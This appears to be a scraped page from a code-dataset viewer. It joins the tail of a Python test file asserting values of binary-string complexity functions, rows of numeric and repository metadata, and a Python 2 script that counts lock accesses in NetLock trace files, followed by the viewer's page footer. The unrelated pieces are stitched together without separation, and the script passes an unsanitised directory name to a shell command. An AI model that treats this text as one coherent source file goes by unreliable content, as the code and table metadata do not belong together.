self.assertAlmostEqual(cpl.tbien('10110111'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('10111000'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('10111001'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('10111010'), 0.8830790701455491)
self.assertAlmostEqual(cpl.tbien('10111011'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('10111100'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('10111101'), 0.7221700225217904)
self.assertAlmostEqual(cpl.tbien('10111110'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('10111111'), 0.8589468375430831)
self.assertAlmostEqual(cpl.tbien('11000000'), 0.6813985994017482)
self.assertAlmostEqual(cpl.tbien('11000001'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('11000010'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('11000011'), 0.4221841326124382)
self.assertAlmostEqual(cpl.tbien('11000100'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('11000101'), 0.7829798725688102)
self.assertAlmostEqual(cpl.tbien('11000110'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('11000111'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('11001000'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('11001001'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('11001010'), 0.7325361991075866)
self.assertAlmostEqual(cpl.tbien('11001011'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('11001100'), 0.1674302125437542)
self.assertAlmostEqual(cpl.tbien('11001101'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('11001110'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('11001111'), 0.7095199614690969)
self.assertAlmostEqual(cpl.tbien('11010000'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('11010001'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('11010010'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('11010011'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('11010100'), 0.7596489755084861)
self.assertAlmostEqual(cpl.tbien('11010101'), 0.819887472797562)
self.assertAlmostEqual(cpl.tbien('11010110'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('11010111'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('11011000'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('11011001'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('11011010'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('11011011'), 0.7221700225217904)
self.assertAlmostEqual(cpl.tbien('11011100'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('11011101'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('11011110'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('11011111'), 0.8940170728237214)
self.assertAlmostEqual(cpl.tbien('11100000'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('11100001'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('11100010'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('11100011'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('11100100'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('11100101'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('11100110'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('11100111'), 0.747313573877627)
self.assertAlmostEqual(cpl.tbien('11101000'), 0.7345054241526495)
self.assertAlmostEqual(cpl.tbien('11101001'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('11101010'), 0.8858024472734408)
self.assertAlmostEqual(cpl.tbien('11101011'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('11101100'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('11101101'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('11101110'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('11101111'), 0.8562234604151914)
self.assertAlmostEqual(cpl.tbien('11110000'), 0.3940627705450895)
self.assertAlmostEqual(cpl.tbien('11110001'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('11110010'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('11110011'), 0.7095199614690969)
self.assertAlmostEqual(cpl.tbien('11110100'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('11110101'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('11110110'), 0.7706444709379511)
self.assertAlmostEqual(cpl.tbien('11110111'), 0.8562234604151914)
self.assertAlmostEqual(cpl.tbien('11111000'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('11111001'), 0.7202007974767275)
self.assertAlmostEqual(cpl.tbien('11111010'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('11111011'), 0.8940170728237214)
self.assertAlmostEqual(cpl.tbien('11111100'), 0.6813985994017482)
self.assertAlmostEqual(cpl.tbien('11111101'), 0.8589468375430831)
self.assertAlmostEqual(cpl.tbien('11111110'), 0.7930318630672043)
self.assertAlmostEqual(cpl.tbien('11111111'), 0.0)
def test_cyclic_binary_derivative(self):
self.assertEqual(cpl.cyclic_binary_derivative('10101110'), '11110011')
self.assertEqual(cpl.cyclic_binary_derivative('11110011'), '00010100')
self.assertEqual(cpl.cyclic_binary_derivative('00010100'), '00111100')
self.assertEqual(cpl.cyclic_binary_derivative('00111100'), '01000100')
self.assertEqual(cpl.cyclic_binary_derivative('01000100'), '11001100')
self.assertEqual(cpl.cyclic_binary_derivative('11001100'), '01010101')
self.assertEqual(cpl.cyclic_binary_derivative('01010101'), '11111111')
def test_ktbien(self):
# 2-bit strings
self.assertEqual(cpl.ktbien('00'), 0.0)
self.assertEqual(cpl.ktbien('01'), 1.0)
self.assertEqual(cpl.ktbien('10'), 1.0)
self.assertEqual(cpl.ktbien('11'), 0.0)
# other cases
self.assertAlmostEqual(cpl.ktbien('10101110'), 0.9209131731629818)
| 70.408867 | 78 | 0.722405 | 4,173 | 42,879 | 7.412892 | 0.097771 | 0.369981 | 0.422836 | 0.246202 | 0.849745 | 0.831157 | 0.012963 | 0.009763 | 0.009763 | 0.009763 | 0 | 0.373851 | 0.139882 | 42,879 | 608 | 79 | 70.524671 | 0.464901 | 0.006087 | 0 | 0 | 0 | 0 | 0.106644 | 0 | 0 | 0 | 0 | 0 | 0.986486 | 1 | 0.008446 | false | 0 | 0.003378 | 0 | 0.013514 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d03e7e195c1018c535ed8c9294c8ba6017f0669a | 6,271 | py | Python | dpdk_code/lock_server_code/statistic.py | netx-repo/NetLock | b4f44efd7b01bca2ecd661a5c7876ada4d7af5fb | [
"Apache-2.0"
] | 12 | 2020-07-31T13:51:00.000Z | 2022-01-02T08:03:19.000Z | dpdk_code/lock_server_code/statistic.py | netx-repo/NetLock | b4f44efd7b01bca2ecd661a5c7876ada4d7af5fb | [
"Apache-2.0"
] | null | null | null | dpdk_code/lock_server_code/statistic.py | netx-repo/NetLock | b4f44efd7b01bca2ecd661a5c7876ada4d7af5fb | [
"Apache-2.0"
] | 2 | 2020-09-02T18:26:36.000Z | 2021-04-21T06:14:11.000Z | import os, sys, subprocess
MAX_LOCK_NUM = 7000000
def print_usage():
print "Usage:"
print " ./statistic.py dirname client_num warehouse_num"
return
def do_map(dirname, client_num, warehouse):
print "dirname:", dirname
cmd_list = "ls -l " + dirname + " | grep trace | awk -F [' ']+ '{print $9}'"
output_list = subprocess.check_output(cmd_list, shell=True).strip('\n')
file_list = output_list.split('\n')
lock_num = 50000
print file_list
count = [0 for i in range(lock_num)]
for filename in file_list:
fullname = dirname.split('\\')[0] + dirname.split('\\')[1] + "/" + filename
print fullname
fin = open(fullname)
fin.readline()
fin.readline()
while True:
line = fin.readline()
if not line:
break
words = [x.strip() for x in line.split(',')]
txn_id = int(words[0])
action_type = int(words[1])
target_lm_id = int(words[2])
target_obj_idx = int(words[3])
lock_type = int(words[4])
target_obj_idx = target_obj_idx + 1
if (lock_type == 7) or (lock_type == 8):
lock_type = 1
elif (lock_type == 9):
lock_type = 2
lock_type = lock_type - 1
if (target_obj_idx <= 20):
lock_id = target_obj_idx
else:
lock_id = 20 + (target_obj_idx - 20) / 150
count[lock_id] += 1
l_count = []
for i in range(lock_num + 1):
l_count.append((i, count[i]))
l_count.sort(key = (lambda element:element[1]), reverse = True)
fout = open("stat/tpcc_incast_"+ client_num +"_w_" + warehouse +"_domap.stat", "w")
for i in range(lock_num + 1):
if l_count[i][1] > 0:
fout.write(str(l_count[i][0])+','+str(l_count[i][1])+'\n')
fout.close()
def no_map(dirname, client_num, warehouse):
print "dirname:", dirname
cmd_list = "ls -l " + dirname + " | grep trace | awk -F [' ']+ '{print $9}'"
output_list = subprocess.check_output(cmd_list, shell=True).strip('\n')
file_list = output_list.split('\n')
print file_list
lock_num = MAX_LOCK_NUM
count = [0 for i in range(lock_num+1)]
for filename in file_list:
num_file = int(filename.strip('.csv').strip('trace_'))
if num_file > 64+40:
continue
fullname = dirname.split('\\')[0] + dirname.split('\\')[1] + "/" + filename
print fullname
fin = open(fullname)
fin.readline()
fin.readline()
while True:
line = fin.readline()
if not line:
break
words = [x.strip() for x in line.split(',')]
if (len(words) <= 4):
continue
txn_id = int(words[0])
action_type = int(words[1])
if (action_type == 1):
continue
target_lm_id = int(words[2])
target_obj_idx = int(words[3])
lock_type = int(words[4])
target_obj_idx = target_obj_idx + 1
if (lock_type == 7) or (lock_type == 8):
lock_type = 1
elif (lock_type == 9):
lock_type = 2
lock_type = lock_type - 1
lock_id = target_obj_idx
count[lock_id] += 1
l_count = []
for i in range(lock_num + 1):
l_count.append((i, count[i]))
l_count.sort(key = (lambda element:element[1]), reverse = True)
fout = open("stat/tpcc_multiserver_"+ client_num +"_w_" + warehouse +"_nomap.stat", "w")
for i in range(lock_num + 1):
if l_count[i][1] > 0:
fout.write(str(l_count[i][0])+','+str(l_count[i][1])+'\n')
fout.close()
def max_lock_freq_per_txn(dirname, client_num, warehouse):
print "dirname:", dirname
cmd_list = "ls -l " + dirname + " | grep trace | awk -F [' ']+ '{print $9}'"
output_list = subprocess.check_output(cmd_list, shell=True).strip('\n')
file_list = output_list.split('\n')
print file_list
lock_num = MAX_LOCK_NUM
old_txn_id = -1
count = {}
max_c = 0
for filename in file_list:
fullname = dirname.split('\\')[0] + dirname.split('\\')[1] + "/" + filename
print fullname
fin = open(fullname)
fin.readline()
fin.readline()
while True:
line = fin.readline()
if not line:
break
words = [x.strip() for x in line.split(',')]
txn_id = int(words[0])
action_type = int(words[1])
if action_type == 1:
continue
if (txn_id != old_txn_id):
if (len(count) != 0):
for i in count:
if (count[i] > max_c):
max_c = count[i]
max_lock = i
max_txn = old_txn_id
count_log = count
# if (max(count.values()) > max_c):
# max_c = max(count.values())
# max_lock = max(count, key=count.get)
# max_txn = old_txn_id
# count_log = count
old_txn_id = txn_id
count = {}
target_lm_id = int(words[2])
target_obj_idx = int(words[3])
lock_type = int(words[4])
target_obj_idx = target_obj_idx + 1
if (lock_type == 7) or (lock_type == 8):
lock_type = 1
elif (lock_type == 9):
lock_type = 2
lock_type = lock_type - 1
lock_id = target_obj_idx
if (lock_id not in count):
count[lock_id] = 1
else:
count[lock_id] += 1
print max_txn, ":", max_lock, ":", max_c
print count_log
print "max count:", max_c
def main():
if (len(sys.argv) <= 3):
print_usage()
sys.exit(-1)
dirname = sys.argv[1]
client_num = sys.argv[2]
warehouse = sys.argv[3]
# max_lock_freq_per_txn(dirname, client_num, warehouse)
no_map(dirname, client_num, warehouse)
if __name__ == '__main__':
main() | 35.230337 | 92 | 0.509807 | 810 | 6,271 | 3.702469 | 0.134568 | 0.064021 | 0.056019 | 0.050017 | 0.772591 | 0.755585 | 0.744915 | 0.744582 | 0.71057 | 0.690897 | 0 | 0.025398 | 0.359592 | 6,271 | 178 | 93 | 35.230337 | 0.721365 | 0.033009 | 0 | 0.70625 | 0 | 0 | 0.059095 | 0.003632 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.00625 | null | null | 0.11875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.